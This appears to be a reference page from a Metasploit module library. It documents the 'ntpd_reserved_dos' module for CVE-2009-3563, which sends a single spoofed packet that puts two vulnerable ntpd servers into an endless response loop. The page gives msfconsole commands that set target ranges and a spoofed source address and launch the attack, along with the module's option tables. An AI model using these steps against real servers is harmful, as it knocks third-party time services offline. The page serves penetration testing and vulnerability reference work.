NTP.org ntpd Reserved Mode Denial of Service - Metasploit


This page contains detailed information about how to use the auxiliary/dos/ntp/ntpd_reserved_dos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: NTP.org ntpd Reserved Mode Denial of Service
Module: auxiliary/dos/ntp/ntpd_reserved_dos
Source code: modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
Disclosure date: 2009-10-04
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2009-3563

This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/dos/ntp/ntpd_reserved_dos
msf auxiliary(ntpd_reserved_dos) > show options
    ... show and set options ...
msf auxiliary(ntpd_reserved_dos) > set RHOSTS ip-range
msf auxiliary(ntpd_reserved_dos) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(ntpd_reserved_dos) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(ntpd_reserved_dos) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(ntpd_reserved_dos) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • LHOST: The spoofed address of a vulnerable ntpd server

Go back to menu.

Msfconsole Usage


Here is how the dos/ntp/ntpd_reserved_dos auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/ntp/ntpd_reserved_dos

msf6 auxiliary(dos/ntp/ntpd_reserved_dos) > show info

       Name: NTP.org ntpd Reserved Mode Denial of Service
     Module: auxiliary/dos/ntp/ntpd_reserved_dos
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2009-10-04

Provided by:
  todb <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  INTERFACE                   no        The name of the interface
  LHOST                       yes       The spoofed address of a vulnerable ntpd server
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  SNAPLEN    65535            yes       The number of bytes to capture
  THREADS    1                yes       The number of concurrent threads (max one per host)
  TIMEOUT    500              yes       The number of seconds to wait for new data

Description:
  This module exploits a denial of service vulnerability within the 
  NTP (network time protocol) demon. By sending a single packet to a 
  vulnerable ntpd server (Victim A), spoofed from the IP address of 
  another vulnerable ntpd server (Victim B), both victims will enter 
  an infinite response loop. Note, unless you control the spoofed 
  source host or the real remote host(s), you will not be able to halt 
  the DoS condition once begun!

References:
  http://www.securityfocus.com/bid/37255
  https://nvd.nist.gov/vuln/detail/CVE-2009-3563
  OSVDB (60847)
  https://support.ntp.org/bugs/show_bug.cgi?id=1331

Module Options


This is a complete list of options available in the dos/ntp/ntpd_reserved_dos auxiliary module:

msf6 auxiliary(dos/ntp/ntpd_reserved_dos) > show options

Module options (auxiliary/dos/ntp/ntpd_reserved_dos):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   LHOST                       yes       The spoofed address of a vulnerable ntpd server
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The number of seconds to wait for new data

Advanced Options


Here is a complete list of advanced options supported by the dos/ntp/ntpd_reserved_dos auxiliary module:

msf6 auxiliary(dos/ntp/ntpd_reserved_dos) > show advanced

Module advanced options (auxiliary/dos/ntp/ntpd_reserved_dos):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   GATEWAY_PROBE_HOST   8.8.8.8          yes       Send a TTL=1 random UDP datagram to this host to discover the default gateway's MAC
   GATEWAY_PROBE_PORT                    no        The port on GATEWAY_PROBE_HOST to send a random UDP probe to (random if 0 or unset)
   SECRET               1297303073       yes       A 32-bit cookie for probe requests.
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/ntp/ntpd_reserved_dos module can do:

msf6 auxiliary(dos/ntp/ntpd_reserved_dos) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/ntp/ntpd_reserved_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/ntp/ntpd_reserved_dos) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • todb

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.